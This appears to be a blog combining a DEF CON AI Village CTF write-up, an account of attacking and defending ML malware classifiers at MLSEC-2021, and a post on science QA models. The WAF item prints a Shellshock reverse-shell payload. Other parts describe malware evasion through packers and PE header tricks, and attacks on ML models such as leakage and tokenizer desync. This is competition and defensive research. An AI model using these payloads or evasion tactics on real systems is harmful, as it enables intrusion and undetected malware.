Tuesday, September 27, 2022

AI Village Capture the Flag @ DEFCON write up

In August 2022 I had the chance to participate in an AI-themed CTF co-located with the DEF CON 30 security (hacking) conference. It was particularly interesting because it was presented in a novel format: a Kaggle competition where the leaderboard was ranked by the points awarded for each discovered flag. Despite entering the competition at a late stage, I managed to solve all the challenges but two, achieving the second-best score (although my final ranking was lower because submission times were used as tie-breakers). No one was able to find the last flag, corresponding to the Crop_2 challenge, until after the CTF ended.

Overall, this was quite different from previous adversarial ML competitions and aligned more with the type of ML-related challenges seen in traditional CTFs. My solutions for each flag were as follows:

  • Hotdog: Submitted a picture of a hotdog.
  • Math_1-4: Brute forced by guessing the upper and lower bounds of the expected solutions.
  • Honor Student: Solved via hill-climbing by incrementally adding noise.
  • Wifi: Obtained the flag by using argmin(embeddings) as character indexes.
  • Bad to Good: Found that negative demerits were not properly handled and that did the trick.
  • Baseball: Solved via hill-climbing after guessing the distribution for that player through grid search.
  • Inference: The hint in the challenge description gave it away. Since I knew the number of characters, I just had to try different combinations until D3FC0N was accepted.
  • Leakage: Passed the username as input to the LSTM which returned the password.
  • Forensics: The flag was in the model itself which could be accessed via model.summary().
  • Token: This was a tokenizer desync attack. Replacing BLANK was the solution.
  • Deepfake: Submitted random videos from YouTube until I found one that was accepted as valid.
  • Murderbots: Identified power and temperature values via anomaly detection (deviations from the mean) that were likely human related. That gave me 9 indexes and I just had to guess the last one manually.
  • Hotterdog/Theft/Salt: Generated adversarial examples with the provided models using the fast gradient sign (FGS) method.
  • Crop_1: Generated the solution image via hill-climbing:

  • WAF: The hints led me to a well-known exploit used by crypto-mining campaigns. Then it was all trial and error to figure out which portions were deemed malicious. The final step involved obfuscating the b64 with spaces.
    • () { :;}; /bin/bash -c "bash -i >& /dev/tcp/ 0<&1
  • Secret Sloth: Could not solve this one, although I was pretty close and located the exact place where the flag was and decoded some of the letters. It could have been solved via brute force as some participants shared later :(

  • Crop_2: Ran out of time so I could not even attempt to solve this one.
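
Several of the flags above (Honor Student, Baseball, Crop_1) were obtained with the same kind of black-box hill-climbing loop. The following is only a minimal sketch of that idea, not the code used in the CTF: `toy_score` and `TARGET` are hypothetical stand-ins for a challenge endpoint that returns a score for each submission.

```python
import random

def hill_climb(score, start, step=0.1, iterations=2000, seed=0):
    """Black-box hill-climbing: add random noise and keep it only if the score improves."""
    rng = random.Random(seed)
    best = list(start)
    best_score = score(best)
    for _ in range(iterations):
        # Perturb every coordinate with small Gaussian noise
        candidate = [x + rng.gauss(0.0, step) for x in best]
        candidate_score = score(candidate)
        if candidate_score > best_score:
            best, best_score = candidate, candidate_score
    return best, best_score

# Hypothetical oracle: the real challenges exposed a remote scoring API instead
TARGET = [0.3, -1.2, 2.0]

def toy_score(x):
    # Higher is better; the maximum (0.0) is reached at TARGET
    return -sum((a - b) ** 2 for a, b in zip(x, TARGET))

start = [0.0, 0.0, 0.0]
solution, final_score = hill_climb(toy_score, start)
```

The only requirement is an oracle that returns a comparable score per query, which is why the same loop can be reused across unrelated challenges.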

Thursday, March 17, 2022

Defending and attacking ML Malware Classifiers for Fun and Profit: 2x prize winner at MLSEC-2021

MLSEC (Machine Learning Security Evasion Competition) is an initiative sponsored by Microsoft and partners CUJO AI, NVIDIA, VMRay, and MRG Effitas with the purpose of raising awareness of the expanding attack surface which is now also affecting AI-powered systems. 

In its 3rd edition the competition allowed defenders and attackers to exercise their security and machine learning skills under a plausible threat model: evading anti-malware and anti-phishing filters. In the competition, defenders aimed to detect evasive submissions by using machine learning (ML), and attackers attempted to circumvent those detections.

The anti-malware track had two parts: a defensive part, focused on creating anti-malware models able to withstand adversarial attacks while meeting certain FPR/TPR criteria, and an offensive part, in which competitors had to bypass the defender models by modifying a set of 50 malware samples provided by the organizers in a way that would still run and produce the same IOCs in a sandboxed environment.

Defensive anti-malware track

PE files have a very large feature space to defend and (even with droppers disallowed this year) it was obvious to me that any malware detection model that I could train with reasonable computing power and public training resources would be relatively easy to bypass.  

Taking into account that the feedback loop between submitting a modified malware sample to the MLSEC backend and receiving the execution sandbox results involved a considerable delay (around 1h), and knowing that defeating models in a black-box setting would require many queries, I decided to focus on slowing down certain attack paths, aiming for deterrence rather than model robustness. The goal was to discourage attackers from trying to evade my system, under the hypothesis that they would spend their resources on easier targets first.

In order to do that I placed several layers of defense in the submitted "A1" solution: 

  • First, traditional approaches were deployed, such as ensembles trained on SOREL and EMBER datasets using gradient boosted trees. Additional feature engineering was added targeting packers and concealed binaries.
  • Second, PE anomaly detection rules would look for suspicious data in sections and headers that are usually manipulated during adversarial tests.
  • Third, a stateful defense would compare each submitted file with previously convicted files submitted to the system. This not only detects adversarial variants but also forces attackers to produce substantially different files that still need to run successfully in the sandbox. The comparison method purposely includes only areas which are a priori harder to modify without a packer/dropper approach, such as data and code from the first PE section.
  • Finally, a moving target defense composed of an ensemble of non-deterministic classifiers that would slightly modify their decision function on each run was placed in order to further confuse attackers. This layer would concede evasions inconsistently, providing contradictory clues about the evasion success (or failure).
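
To make the last two layers more concrete, here is a rough sketch of how a stateful check and a moving-target threshold could be combined. Everything in it is an assumption for illustration: the byte n-gram Jaccard similarity, the thresholds, the order of the checks and the names (`StatefulDefense`, `moving_target_verdict`, `classify`) are not taken from the submitted "A1" solution, and extracting the first PE section is assumed to happen elsewhere.

```python
import random

def shingles(data: bytes, size: int = 8) -> set:
    """Set of overlapping byte n-grams, used as a cheap similarity fingerprint."""
    return {data[i:i + size] for i in range(max(len(data) - size + 1, 1))}

def jaccard(a: set, b: set) -> float:
    union = a | b
    return len(a & b) / len(union) if union else 0.0

class StatefulDefense:
    """Remembers fingerprints of convicted files and flags near-duplicates."""
    def __init__(self, similarity_threshold: float = 0.6):
        self.similarity_threshold = similarity_threshold
        self.convicted = []

    def is_variant(self, first_section: bytes) -> bool:
        fingerprint = shingles(first_section)
        return any(jaccard(fingerprint, old) >= self.similarity_threshold
                   for old in self.convicted)

    def remember(self, first_section: bytes) -> None:
        self.convicted.append(shingles(first_section))

def moving_target_verdict(score, rng, base_threshold=0.5, jitter=0.1):
    """Non-deterministic decision: the threshold shifts slightly on every call."""
    return score >= base_threshold + rng.uniform(-jitter, jitter)

def classify(first_section, model_score, state, rng):
    # Near-duplicates of convicted files are flagged regardless of the model score
    if state.is_variant(first_section):
        return True
    malicious = moving_target_verdict(model_score, rng)
    if malicious:
        state.remember(first_section)
    return malicious

rng = random.Random(1)
state = StatefulDefense()
original = bytes(range(256)) * 4                 # stand-in for first-section bytes
variant = original[:1000] + b"\x90" * 24         # small tail modification
first = classify(original, 0.9, state, rng)      # high score: convicted and remembered
second = classify(variant, 0.1, state, rng)      # low score, but close to a convicted file
third = classify(b"\x00" * 1024, 0.1, state, rng)  # unrelated content with a low score
```

In this toy run the variant is caught by the stateful layer even though its model score is low, while scores close to the base threshold would receive inconsistent verdicts across runs.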

These together did relatively well and placed me in a second "in-the-money" position very close to the winning approach:

There were some other "fun" restrictions, like having to pack the defender as a docker image within a certain file size and keeping latency low when analyzing files and providing the verdict. In order to do that the docker base image had to be stripped to the max by deleting certain unused libraries and packages by hand, leaving the OS unstable in some cases...

Offensive anti-malware track

There were 6 defender systems unknown to the participants. However, since there are not many publicly available large-scale malware datasets besides EMBER and SOREL, it wasn't unreasonable to believe that attacks that successfully evade baseline models trained on these datasets should in principle have better chances of evasion, or at the very least provide a better starting point than targeting the defenders directly using black-box attacks.

Therefore the chosen strategy was to perform a mix of white-box and black-box attacks against EMBER and SOREL baselines while also extracting knowledge from the evaded defender systems in order to manually fine-tune further attacks in an iterative way.

Black box:

White box:
  • Feature importance of baseline SOREL and EMBER models
  • Lime and SHAP analysis of baseline SOREL and EMBER models:

Other approaches such as PE header fuzzing yielded few but interesting results, such as highlighting the fact that the EMBER feature set makes use of PE header fields ignored by the Windows loader, which opens the door to more interesting adversarial modifications by purposely generating apparently broken PEs which would still run fine in the sandbox. A few more were identified but are left as an exercise to the reader ;).
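
As an illustration of what header fuzzing means at the byte level, the sketch below overwrites a single COFF header field in a PE buffer. The choice of TimeDateStamp is purely my assumption for the example (it is a field that is generally not needed to run a binary); it is not one of the fields alluded to above, and the toy buffer is not a runnable executable.

```python
import random
import struct

E_LFANEW_OFFSET = 0x3C      # DOS header field holding the offset of the PE signature
TIMESTAMP_OFFSET_IN_PE = 8  # "PE\0\0" (4) + Machine (2) + NumberOfSections (2)

def fuzz_timestamp(pe_bytes: bytes, rng: random.Random) -> bytes:
    """Return a copy of the PE with a random COFF TimeDateStamp."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (pe_offset,) = struct.unpack_from("<I", pe_bytes, E_LFANEW_OFFSET)
    if pe_bytes[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    mutated = bytearray(pe_bytes)
    struct.pack_into("<I", mutated, pe_offset + TIMESTAMP_OFFSET_IN_PE,
                     rng.getrandbits(32))
    return bytes(mutated)

# Toy buffer with just enough structure to exercise the function
toy = bytearray(0x100)
toy[:2] = b"MZ"
struct.pack_into("<I", toy, E_LFANEW_OFFSET, 0x80)          # e_lfanew -> 0x80
toy[0x80:0x84] = b"PE\x00\x00"
struct.pack_into("<HHI", toy, 0x84, 0x14C, 1, 0x5F000000)   # Machine, NumberOfSections, TimeDateStamp
mutated = fuzz_timestamp(bytes(toy), random.Random(7))
```

A real fuzzing run would iterate over many fields and values, score each mutated file against the baseline models, and submit only the candidates expected to still execute.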

While droppers were not allowed in this edition, crypters/packers were. I tried a few and had moderate success with some malware binaries. The main caveat is that when the evasion fails, the packer stub risks being fingerprinted by stateful defenses. Likewise, several malware samples were either loaders themselves or had some sort of integrity checks. These were probably cherry-picked by the organizers to limit packer effectiveness after their success in previous editions.

Overall, generating non-detected variants was relatively easy; the main challenge was generating variants that would both evade detection and execute successfully in the organizers' sandbox. I chose not to test the modified malware binaries locally before submission, which forced me to use extra API calls (almost 6 times more than the winning team).

I was ranked second on this track as well, with just 29 fewer evasions than the winning team.

Overall, the competition was fun and the experimental results quite interesting, but there are some things the organizers may want to address in future editions. For example, the defenders' FP rate was enforced considering only clean binaries from a Windows system. This caused some controversy, as it was possible to submit a defender that would classify only that particular set as clean and everything else as malware.
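
To see why this is a loophole, consider the following deliberately degenerate defender. It is only a sketch under the assumption that the clean evaluation set can be enumerated and hashed in advance; the function names and the sample data are made up for illustration.

```python
import hashlib

def build_allowlist(clean_files):
    """SHA-256 digests of the known clean binaries."""
    return {hashlib.sha256(data).hexdigest() for data in clean_files}

def degenerate_defender(sample: bytes, allowlist) -> int:
    """Return 0 (benign) only for allow-listed files and 1 (malware) for everything else."""
    return 0 if hashlib.sha256(sample).hexdigest() in allowlist else 1

# Made-up stand-ins for the contents of clean system binaries
allowlist = build_allowlist([b"clean binary A", b"clean binary B"])
verdict_clean = degenerate_defender(b"clean binary A", allowlist)
verdict_other = degenerate_defender(b"any other file", allowlist)
```

Such a defender would show a zero FP rate on the evaluation set and detect every submitted malware variant, while being useless on any clean file outside that set.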


amsqr at MLSEC-2021: Thwarting Adversarial Malware Evasion with a Defense-in-Depth



Kipple: Towards accessible, robust malware classification

CC10 - Building & Defending a Machine Learning Malware Classifier: Taking 3rd at MLSEC 2021

Towards Machines that Capture and Reason with Science Knowledge

In 2015 I took part in a machine learning competition hosted on Kaggle that aimed to solve a multiple-choice 8th grade science test. At that time there weren't large pretrained models to leverage and (unsurprisingly) the best performing models were IR-based ones that would barely achieve a GPA of 1.0 in the US grading system:

However, several years later (and several thousands of $$$ spent training large Transformers), Allen AI researchers reported in 2020 substantially better results using either BERT or RoBERTa based QA solvers. This major breakthrough means that a QA system leveraging publicly available language models and training data could achieve 90%+ (GPA-4) in a similar 8th grade test:

The success of Transformers in NLP has opened several possibilities unthinkable not many years ago, making it possible not only to solve arbitrary natural language processing tasks but also paving the way for fully AutoNLP solutions that could work without human intervention.


Project Aristo: Towards Machines that Capture and Reason with Science Knowledge

From ‘F’ to ‘A’ on the N.Y. Regents Science Exams: An Overview of the Aristo Project

Prize winning solution to the Kaggle challenge (GitHub)